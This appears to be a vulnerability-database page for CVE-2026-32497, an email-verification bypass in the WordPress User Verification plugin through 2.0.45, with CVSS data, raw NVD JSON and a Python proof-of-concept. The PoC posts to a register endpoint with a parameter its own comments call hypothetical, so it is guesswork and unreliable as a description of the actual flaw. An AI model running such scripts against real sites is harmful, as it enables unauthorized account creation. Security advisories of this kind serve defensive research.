Security Vulnerability Report
中文
CVE-2026-32497 CVSS 5.3 MEDIUM

CVE-2026-32497

Published: 2026-03-25 17:17:02
Last Modified: 2026-04-29 10:17:15

Description

Weak Authentication vulnerability in PickPlugins User Verification user-verification allows Authentication Abuse.This issue affects User Verification: from n/a through <= 2.0.45.

CVSS Details

CVSS Score
5.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N

Configurations (Affected Products)

No configuration data available.

PickPlugins User Verification <= 2.0.45

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# PoC Concept for Email Verification Bypass # This script attempts to register a user bypassing email verification logic import requests def exploit(target_url): register_endpoint = f"{target_url}/wp-json/user-verification/v1/register" # Example endpoint payload = { "username": "attacker", "email": "[email protected]", "password": "Passw0rd!", "bypass_validation": True # Hypothetical parameter based on weak auth logic } try: response = requests.post(register_endpoint, data=payload) if response.status_code == 200 and "success" in response.text: print("[+] Exploit successful! Account created/bypassed.") else: print("[-] Exploit failed.") except Exception as e: print(f"Error: {e}") # exploit("http://target-site.com")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-32497", "sourceIdentifier": "[email protected]", "published": "2026-03-25T17:17:01.533", "lastModified": "2026-04-29T10:17:15.360", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Weak Authentication vulnerability in PickPlugins User Verification user-verification allows Authentication Abuse.This issue affects User Verification: from n/a through <= 2.0.45."}, {"lang": "es", "value": "Vulnerabilidad de autenticación débil en PickPlugins User Verification user-verification permite el abuso de autenticación. Este problema afecta a User Verification: desde n/a hasta &lt;= 2.0.45."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}, {"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-1390"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/user-verification/vulnerability/wordpress-user-verification-plugin-2-0-45-email-verification-bypass-vulnerability?_s_id=cve", "source": "[email protected]"}]}}